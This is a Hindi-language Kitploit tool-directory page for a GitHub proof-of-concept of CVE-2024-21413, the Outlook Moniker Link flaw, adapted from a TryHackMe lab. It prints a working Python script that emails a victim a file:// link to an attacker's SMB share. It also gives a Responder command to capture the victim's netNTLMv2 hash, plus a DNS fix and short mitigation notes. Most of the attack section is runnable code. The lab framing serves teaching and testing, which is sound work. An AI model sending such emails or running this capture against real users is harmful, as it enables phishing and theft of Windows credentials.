Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/yass2400012/email-exploit-moniker-link-cve-2024-21413-
पासवर्ड क्रैकिंगशोषणफिशिंगनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगईमेल सुरक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubyass2400012/email-exploit-moniker-link-cve-2024-21413-

Email-exploit-Moniker-Link-CVE-2024-21413-

CVE-2024-21413 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो HTML ईमेल में Moniker Link का उपयोग करके SMB कनेक्शन ट्रिगर करता है और Responder के माध्यम से netNTLMv2 हैश कैप्चर करता है। यह पेनिट्रेशन टेस्टिंग, Python स्क्रिप्टिंग और नेटवर्क प्रोटोकॉल एनालिसिस कौशल प्रदर्शित करता है।

रिपॉजिटरी देखें
511 महीने पहलेअभी तक समीक्षित नहीं

ईमेल शोषण Moniker Link-CVE-2024-21413-Module — दस्तावेज़ीकरण

अवलोकन: एक व्यावहारिक PoC जो HTML ईमेल में Moniker Link के उपयोग को प्रदर्शित करता है ताकि Outlook से SMB कनेक्शन ट्रिगर हो सके, जिससे Responder के माध्यम से पीड़ित के netNTLMv2 हैश को कैप्चर किया जा सके। यह पेनिट्रेशन टेस्टिंग, स्क्रिप्टिंग और नेटवर्क प्रोटोकॉल विश्लेषण में व्यावहारिक कौशल दिखाता है।


प्रदर्शित मुख्य कौशल

  • स्वचालित ईमेल वितरण के लिए Python स्क्रिप्टिंग
  • SMB, NTLMv2, LLMNR, NBT-NS और MDNS प्रोटोकॉल की समझ
  • हैश कैप्चर के लिए Responder कॉन्फ़िगरेशन और निगरानी
  • Linux नेटवर्क/DNS कॉन्फ़िगरेशन समस्याओं का समस्या निवारण
  • प्रयोगशाला वातावरण में नियंत्रित आक्रामक सुरक्षा परिदृश्य तैयार करना

PoC कार्यप्रवाह

  1. SMB लिसनर सेट अप करें: हमला मशीन पर Responder चालू करें ताकि SMB प्रमाणीकरण प्रयासों की निगरानी हो सके।
  2. तैयार किया गया ईमेल भेजें: हमलावर के SMB शेयर की ओर इशारा करते हुए Moniker Link (file://) वाला HTML ईमेल भेजने के लिए Python स्क्रिप्ट का उपयोग करें।
  3. हैश कैप्चर करें: जब पीड़ित लिंक पर क्लिक करता है, Outlook SMB के माध्यम से फ़ाइल लाने का प्रयास करता है, और Responder netNTLMv2 हैश कैप्चर कर लेता है।

न्यूनतम शोषण स्क्रिप्ट

root@kitploit:~
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124'  # THM SMTP server
password = input('Enter attacker email password: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')

टिप: चलाने से पहले ATTACKER_IP और mailserver बदल दें। TryHackMe लैब में, पासवर्ड attacker है।


Responder चलाना

root@kitploit:~
responder -I ens5

ens5 को अपने नेटवर्क इंटरफ़ेस नाम से बदलें।


/etc/resolv.conf का समस्या निवारण

कभी-कभी /etc/resolv.conf में टूटी हुई सिमलिंक के कारण Responder विफल हो जाता है। इसे ठीक करें:

root@kitploit:~
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf

उजागर कौशल: Linux समस्या निवारण, DNS कॉन्फ़िगरेशन, और क्लाउड/VM वातावरण में टूल्स को अनुकूलित करना।


प्रगति स्क्रीनशॉट

  1. त्रुटि / Resolv.conf समस्या:` त्रुटि / Resolv.conf समस्या

  2. DNS फिक्स लागू किया गया: DNS फिक्स लागू किया गया

  3. Python ईमेल स्क्रिप्ट: Python ईमेल स्क्रिप्ट

  4. शोषण वितरण: शोषण वितरण

  5. पीड़ित का इनबॉक्स: पीड़ित का इनबॉक्स

  6. कैप्चर किया गया पीड़ित हैश: कैप्चर किया गया पीड़ित हैश


उपयोग किए गए उपकरण और कमांड

  • Responder: SMB/LLMNR/NBT-NS/MDNS लिसनर
  • Python3: PoC ईमेल स्क्रिप्ट निष्पादन
  • smtplib / email.mime: ईमेल तैयार करने और भेजने के लिए Python लाइब्रेरीज़
  • DNS समस्या निवारण के लिए Linux शेल कमांड

सीखे गए कौशल / पोर्टफोलियो हाइलाइट

  • नेटवर्क हमला सिमुलेशन और शोषण कार्यप्रवाह
  • सोशल इंजीनियरिंग वेक्टर (Moniker Link ईमेल) का स्वचालन
  • netNTLMv2 हैश कैप्चर करना और उनका विश्लेषण करना
  • क्रॉस-डिसिप्लिन समस्या निवारण: Python, नेटवर्किंग, Windows और Linux इंटरैक्शन
  • तकनीकी समीक्षकों के लिए दस्तावेज़ीकरण और कार्यप्रवाह प्रस्तुति

शमन और रक्षात्मक नोट्स

  • Outlook में स्वचालित बाहरी सामग्री अक्षम करें
  • अविश्वसनीय नेटवर्क पर आउटबाउंड SMB ब्लॉक करें
  • Windows क्लाइंट पर SMB साइनिंग और आधुनिक प्रमाणीकरण नीतियां लागू करें

श्रेय

TryHackMe MonikerLink लैब और CMNatic के मूल PoC से अनुकूलित (GitHub)

टूल डाउनलोड करें